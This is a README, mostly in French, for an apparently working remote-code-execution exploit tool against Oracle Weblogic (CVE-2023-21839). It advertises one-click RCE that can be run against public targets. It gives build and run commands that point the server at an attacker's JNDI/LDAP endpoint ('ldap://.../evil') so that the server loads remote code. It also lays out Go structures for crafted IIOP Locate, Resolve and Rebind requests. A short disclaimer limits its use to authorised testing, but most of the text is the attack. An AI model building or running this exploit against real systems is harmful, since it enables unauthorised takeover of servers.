
Weblogic CVE-2023-21839 RCE (Sans dépendance Java, RCE en un clic)
L'utilisation non autorisée de ce projet pour attaquer ou tester des cibles est illégale. Ce programme doit être utilisé uniquement à des fins de tests de sécurité et de recherche autorisés.
Weblogic CVE-2023-21839 RCE
(1) Aucune dépendance Java requise, construction du protocole via socket pour RCE direct
(2) Problème de réseau NAT IIOP résolu (test possible sur Docker et cibles publiques)
(3) Testé sur Windows/Mac OS/Linux et Weblogic 12/14
(4) Veuillez utiliser JDK 8u191 ou inférieur pour démarrer Weblogic et configurer votre propre serveur JNDI
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Locate Request
type LocateRequest struct {
Header *Header
RequestId []byte // 4
TargetAddress []byte // 2
_reserved []byte // 2
_keyAddressLength []byte // 4
KeyAddress []byte // _keyAddressLength
}
Resolve Request
type ResolveRequest struct {
Header *Header
RequestId []byte // 4
ResponseFlags []byte // 1
_reserved1 []byte // 3
TargetAddress []byte // 2
_reserved2 []byte // 2
_keyAddressLength []byte // 4
KeyAddress []byte // _keyAddressLength
_operationLength []byte // 4
RequestOperation []byte // _operationLength
_reserved3 []byte // 1
ServiceContextList *ServiceContextList
CosNamingDissector []byte // no limit
}
Rebind Request
type RebindRequest struct {
Header *Header
RequestId []byte // 4
ResponseFlags []byte // 1
_reserved1 []byte // 3
TargetAddress []byte // 2
_reserved2 []byte // 2
_keyAddressLength []byte // 4
KeyAddress []byte // _keyAddressLength
_operationLength []byte // 4
RequestOperation []byte // _operationLength
_reserved3 []byte // 2
ServiceContextList *ServiceContextList
StubData []byte // no limit
}